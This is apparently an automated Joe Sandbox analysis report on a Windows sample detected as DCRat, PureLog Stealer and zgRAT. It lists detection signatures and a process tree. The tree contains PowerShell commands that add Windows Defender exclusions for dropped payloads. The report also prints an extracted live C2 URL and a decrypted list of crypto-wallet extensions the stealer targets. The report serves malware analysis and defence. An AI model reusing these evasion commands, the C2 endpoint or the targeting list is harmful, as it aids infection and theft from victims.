Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hz7DzW2Yop.exe

Overview

General Information

Sample name:hz7DzW2Yop.exe
renamed because original name is a hash value
Original sample name:46dcddd43cbaeae845c14e7306726ff2.exe
Analysis ID:1587336
MD5:46dcddd43cbaeae845c14e7306726ff2
SHA1:4952a7cd01795d736450074433337d2a544b1e50
SHA256:ab98b91a647e45e348db97bd277efcc122d10d45a5891bfac3d627f3a865b580
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • hz7DzW2Yop.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\hz7DzW2Yop.exe" MD5: 46DCDDD43CBAEAE845C14E7306726FF2)
    • wscript.exe (PID: 7364 cmdline: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • serverBrokerperfMonitor.exe (PID: 7580 cmdline: "C:\HyperWebbroker/serverBrokerperfMonitor.exe" MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
          • powershell.exe (PID: 7996 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8020 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7704 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 8068 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8120 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6644 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 4048 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 396 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • uAsLgsGzSk.exe (PID: 7860 cmdline: "C:\Windows\ShellExperiences\uAsLgsGzSk.exe" MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
  • uAsLgsGzSk.exe (PID: 1868 cmdline: C:\Recovery\uAsLgsGzSk.exe MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
  • uAsLgsGzSk.exe (PID: 5344 cmdline: C:\Recovery\uAsLgsGzSk.exe MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
  • svchost.exe (PID: 7540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hz7DzW2Yop.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    hz7DzW2Yop.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\SystemSettings.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  5.0.serverBrokerperfMonitor.exe.fe0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\HyperWebbroker/serverBrokerperfMonitor.exe", ParentImage: C:\HyperWebbroker\serverBrokerperfMonitor.exe, ParentProcessId: 7580, ParentProcessName: serverBrokerperfMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', ProcessId: 7996, ProcessName: powershell.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\HyperWebbroker/serverBrokerperfMonitor.exe", ParentImage: C:\HyperWebbroker\serverBrokerperfMonitor.exe, ParentProcessId: 7580, ParentProcessName: serverBrokerperfMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', ProcessId: 7996, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\hz7DzW2Yop.exe", ParentImage: C:\Users\user\Desktop\hz7DzW2Yop.exe, ParentProcessId: 7316, ParentProcessName: hz7DzW2Yop.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" , ProcessId: 7364, ProcessName: wscript.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\HyperWebbroker/serverBrokerperfMonitor.exe", ParentImage: C:\HyperWebbroker\serverBrokerperfMonitor.exe, ParentProcessId: 7580, ParentProcessName: serverBrokerperfMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', ProcessId: 7996, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7540, ProcessName: svchost.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-10T07:57:31.379268+010020480951A Network Trojan was detected192.168.2.44973689.23.100.24280TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: hz7DzW2Yop.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\SystemSettings.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\cIDyHnkk.logAvira: detection malicious, Label: TR/Agent.jbwuj
                                    Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\FyhuXVvF.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\hnxxzxgb.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Found malware configuration
                                    Source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeReversingLabs: Detection: 68%
                                    Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeReversingLabs: Detection: 68%
                                    Source: C:\Recovery\SystemSettings.exeReversingLabs: Detection: 68%
                                    Source: C:\Recovery\uAsLgsGzSk.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\CvvLBlqK.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\FyhuXVvF.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\GvICsVKA.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\IitSDvGY.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\NVLRgsWM.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\cIDyHnkk.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\eIxzTFKJ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\hnxxzxgb.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\htcPaTVC.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\maPwcuvP.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\qTMMgMAe.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\vPOensqX.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\zHJVyCcw.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\zIxCDFUn.logReversingLabs: Detection: 37%
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeReversingLabs: Detection: 68%
                                    Multi AV Scanner detection for submitted file
                                    Source: hz7DzW2Yop.exeReversingLabs: Detection: 68%
                                    Source: hz7DzW2Yop.exeVirustotal: Detection: 59%Perma Link
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\Desktop\LqKTzAAu.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\SystemSettings.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\IitSDvGY.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJoe Sandbox ML: detected
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\NVLRgsWM.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\HupKRiKa.logJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: hz7DzW2Yop.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                                    Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["A304AdlgYtYJeVPUZrJwxZFWxXLmbzyDZ0TzYWTLbOkpi6jNBNaa6qulyeGnR9Fj5VtnCa6CX8Viyax1y8kNZYGtGrB3Qq3bJBtMN5KlRXC8UMxXrPySZ1KgP9hUYDwq","bd9da7f16f55026e79d340b5ea02a5a7f7e28b00743a65fca34947ef8d4bc1c2","0","SUDO","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
                                    Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/","imageJavascriptprocessDefaultsqltest"]]
                                    Source: hz7DzW2Yop.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: hz7DzW2Yop.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000000.1666308899.0000000000933000.00000002.00000001.01000000.00000003.sdmp, hz7DzW2Yop.exe, 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
